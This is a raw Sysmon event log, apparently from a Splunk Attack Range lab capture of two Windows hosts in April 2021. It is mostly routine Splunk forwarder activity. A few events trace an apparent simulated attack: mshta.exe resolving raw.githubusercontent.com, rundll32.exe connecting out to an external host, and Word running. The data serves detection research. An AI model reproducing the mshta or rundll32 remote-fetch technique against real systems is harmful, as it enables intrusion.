AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F460C17968939B2CCC2CBBE8C8AA27D,SHA256=D22B9BDF1C20153702BB8C1BBF1BACFA979769FCCADE838FB1F1866FCDE95FF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441455Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:21.986{42DC5269-CF3C-6086-AA00-00000000BA01}4168NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=1385DDF0A626EB1FF1FAEF0A6E1E1E19,SHA256=D3A04D6A86810FFAE54532D83A4C2D8246C33C9E5E1AB8193B89366C377D56F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441454Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:21.838{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D8D0F1BE7EB72C07D01D4E89F741CC7,SHA256=529F2E946E19DDD6A22860E06D7D162A050716E9963EE0F425F32D3F18F040F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441453Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:21.626{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC7E2DB9DEA5582017E67CF04D532707,SHA256=20245BB97977389B60BA590D32B1C2EAD1350CDA52B3159D7BDDB7F57CA9E8F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000292978Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:19.555{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50654-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x8000000000000000292977Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:18.775{BEA10069-187E-6087-4F0E-00000000BB01}3388C:\Windows\SysWOW64\rundll32.exeWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50653-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x8000000000000000292976Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:21.229{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EF6CBCD8D17C1F81B4C58BEE1B678D52,SHA256=2951403342A6B4D52FBAD4459265874FFDDC9F4E85569A3270B2F773B691B2B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441452Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:21.247{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441451Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:21.247{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000441459Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:19.059{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal63784- 23542300x8000000000000000441458Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:22.629{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BC2F1855B68C902D469EFCC6B4448E3,SHA256=F7407E5C9946E35E698FCB8F054D419D405BBBC36C6A93EC582C2F1DA5B0260C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292991Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:22.970{BEA10069-02B2-6088-142A-00000000BB01}55647064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292990Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:22.948{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC65E284D84A070FCCE9EFA63D6F7352,SHA256=9E95CCBFF019A0D3114D0852BFEE3CD621F50AE37B41C086D7E104F4C8105AB3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292989Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:22.800{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-02B2-6088-142A-00000000BB01}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292988Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:22.800{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292987Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:22.800{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292986Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:22.800{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292985Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:22.800{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292984Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:22.800{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-02B2-6088-142A-00000000BB01}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292983Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:22.800{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-02B2-6088-142A-00000000BB01}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000292982Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:22.686{BEA10069-02B2-6088-142A-00000000BB01}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x8000000000000000292981Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:19.910{BEA10069-02B0-6088-132A-00000000BB01}972raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\SYSTEM32\mshta.exe 10341000x8000000000000000292980Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:22.701{BEA10069-D0C3-6086-1E00-00000000BB01}19842844C:\Windows\sysmon64.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+10a75|C:\Windows\System32\sechost.dll+1004d|C:\Windows\System32\sechost.dll+fe55|C:\Windows\System32\sechost.dll+ed3f|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441457Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:22.248{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441456Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:22.248{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000441465Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:20.559{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62427-false10.0.1.12-8000- 354300x8000000000000000441464Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:20.425{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62426-false10.0.1.12-8089- 23542300x8000000000000000441463Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:23.641{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24723A86CA50136B0481E9827F3339FF,SHA256=E427B2A7CEEDD3ABC6FAEE8F5643F54DB5455F9F64EBDDBBDD1A4B54A540B220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293005Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:23.949{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=529DC66622BA2146D2D26AE304320330,SHA256=D9DD7FB2577B370CF53BC3F5196ED9C4727D82CDE106E7FA91B84507A337CD8F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441462Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:23.249{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441461Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:23.249{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441460Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:23.044{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=133366A1A4E141C7BF3A829579479F94,SHA256=6EC261E22F4C4608458C941A5C4CA98D9181CB1BC524F900276BF5AF6DBD5CC8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293004Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:23.733{BEA10069-02B3-6088-152A-00000000BB01}56206648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000293003Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:23.698{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E25066A168CA1B85979DC50AE65FFE70,SHA256=D4D37662461A9B74AF311BF783DFA2275650D9482C00B3DAFC80770BCE659877,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293002Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:23.601{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293001Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:23.601{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-02B3-6088-152A-00000000BB01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000293000Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:23.601{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292999Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:23.601{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292998Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:23.591{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292997Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 